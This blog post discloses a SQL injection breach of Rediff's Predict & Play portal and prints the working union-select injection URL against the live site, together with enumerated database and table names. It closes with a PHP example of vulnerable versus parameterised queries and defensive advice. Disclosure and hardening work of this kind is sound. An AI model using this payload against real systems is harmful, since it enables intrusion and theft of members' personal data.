It seems hackers have got an easy hold of your Predict & Play portal and are able to ‘predict & play’ with the entire database.
Server = Apache
Version = 5.1.30-log
Powered by = PHP/5.1.4
Current User = firstname.lastname@example.org
Current Database = predictwin
Union Columns = 15
Vuln Url : http://predict.rediff.com/member_profile.php?mem_id=-1+and+1=0+s
nion Select +UNHEX(HEX([visible])),2,3,4,5,6,7,8,9,10,11,12,13,14,15–
predictwin,information_schema, Ivsregistrationdb,Ivsserverdb, PREDICTSCRAPBOOK, crbt, db_stats, editorial, eterno, mboard_mod, mobilerediff, moderator, money
Current Database: predictwin
MemberMaster, Award_CricketPlayer,Award_EventMaster,Award_Group_Master, Award_MailLog, Award_MemberPredictions, Award_PredictionsMaster,Award_TagsMaster, Award_TransactionMaster,CricketPlayer,CricketPlayerStat,
The hacker has even got hold of member details [email id/mobile number/city data], and we suggest Rediff plug the hole [which just adds to your Monday morning blues].
[via: OWASP Pune mailing list]
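For the "plug the hole" part: the classic cause of a bug like this is a numeric query-string parameter (here `mem_id`) concatenated straight into a SQL string, which lets a value such as `-1 union select ...` change the shape of the query. The snippet below is an added example written for this post, not Rediff's code; the table, column and connection values are placeholders, not taken from the dumped schema. It shows the vulnerable pattern next to a hardened version using type validation plus a PDO prepared statement (PDO ships with PHP 5.1, the version reported above).

```php
<?php
// Added example, not the portal's own code. Table/column/DSN names are
// placeholders chosen for illustration.

// VULNERABLE pattern: the raw request value is interpolated into the SQL
// text, so the database cannot tell data from syntax.
function get_member_vulnerable(mysqli $db, $raw_mem_id)
{
    $sql = "SELECT name, city FROM member WHERE mem_id = " . $raw_mem_id;
    return $db->query($sql);
}

// HARDENED pattern: validate the type first, then bind the value as a
// parameter so it is only ever treated as data.
function get_member_safe(PDO $db, $raw_mem_id)
{
    // mem_id is an identifier: reject anything that is not an unsigned
    // integer before it reaches the database layer at all.
    if (!ctype_digit((string) $raw_mem_id)) {
        return null;
    }

    $stmt = $db->prepare('SELECT name, city FROM member WHERE mem_id = :id');
    $stmt->bindValue(':id', (int) $raw_mem_id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row === false) ? null : $row;
}

// Usage: placeholder DSN and credentials; the account should be limited to
// the one database and tables the page actually needs.
$db = new PDO('mysql:host=localhost;dbname=predictwin', 'app_user', 'placeholder_password');
$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares

$member = get_member_safe($db, isset($_GET['mem_id']) ? $_GET['mem_id'] : '');
if ($member === null) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
echo htmlspecialchars($member['name']), ' (', htmlspecialchars($member['city']), ')';
```

Two defensive points beyond the query itself follow from the dump above. First, the attacker could enumerate `information_schema` and a dozen unrelated databases, which means the application's MySQL account had far more than the `SELECT`/`INSERT`/`UPDATE` rights on `predictwin` it needs; a least-privilege grant limits what any future injection can reach. Second, the `and 1=0 ... union select` shape in the reported URL is easy to flag in Apache access logs, so alerting on that pattern gives an early signal while the code fix is rolled out.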
Recommended Read: Note to Web Programmers – (Security) Hole in the Soul is Dangerous.